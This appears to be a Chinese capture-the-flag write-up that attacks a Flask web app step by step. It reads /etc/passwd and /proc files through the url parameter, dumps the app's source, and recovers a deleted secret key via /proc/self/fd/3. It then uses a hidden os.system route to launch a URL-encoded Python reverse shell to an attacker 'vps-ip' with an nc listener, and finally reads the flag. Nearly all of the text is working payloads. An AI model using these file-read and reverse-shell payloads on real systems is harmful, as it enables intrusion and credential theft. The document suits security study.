任意文件读
/page?url=/etc/passwd
读取开启当前进程的命令
/page?url=/proc/self/cmdline# 结果 python2 app.py
读取 app.py
from flask import Flask, Responsefrom flask import render_templatefrom flask import requestimport osimport urllibapp = Flask(__name__)SECRET_FILE = "/tmp/secret.txt"f = open(SECRET_FILE)SECRET_KEY = f.read().strip()os.remove(SECRET_FILE)@app.route('/')def index(): return render_template('search.html')@app.route('/page')def page(): url = request.args.get("url") try: if not url.lower().startswith("file"): res = urllib.urlopen(url) value = res.read() response = Response(value, mimetype='application/octet-stream') response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg' return response else: value = "HACK ERROR!" except: value = "SOMETHING WRONG!" return render_template('search.html', res=value)@app.route('/no_one_know_the_manager')def manager(): key = request.args.get("key") print(SECRET_KEY) if key == SECRET_KEY: shell = request.args.get("shell") os.system(shell) res = "ok" else: res = "Wrong Key!" return resif __name__ == '__main__': app.run(host='0.0.0.0', port=8080)
需要获取 /tmp/secret.txt 文件内容,然而被删除了,用 /proc/self/fd/3 读取到 secret.txt,/proc/self/fd/ 这个目录包含当前进程打开过的文件
/page?url=/proc/self/fd/3# 结果 vLFpmnWL6xdcPOO7oHdgyRtPO15CGqK0B/8biLwVYnM=
反弹 shell
nc -lvnp 80/no_one_know_the_manager?key=vLFpmnWL6xdcPOO7oHdgyRtPO15CGqK0B/8biLwVYnM=&shell=python%20-c%20%22import%20os%2Csocket%2Csubprocess%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect(('vps-ip'%2C80))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B'%2Fbin%2Fbash'%2C'-i'%5D)%3B%22
读取 flag
/page?url=/flag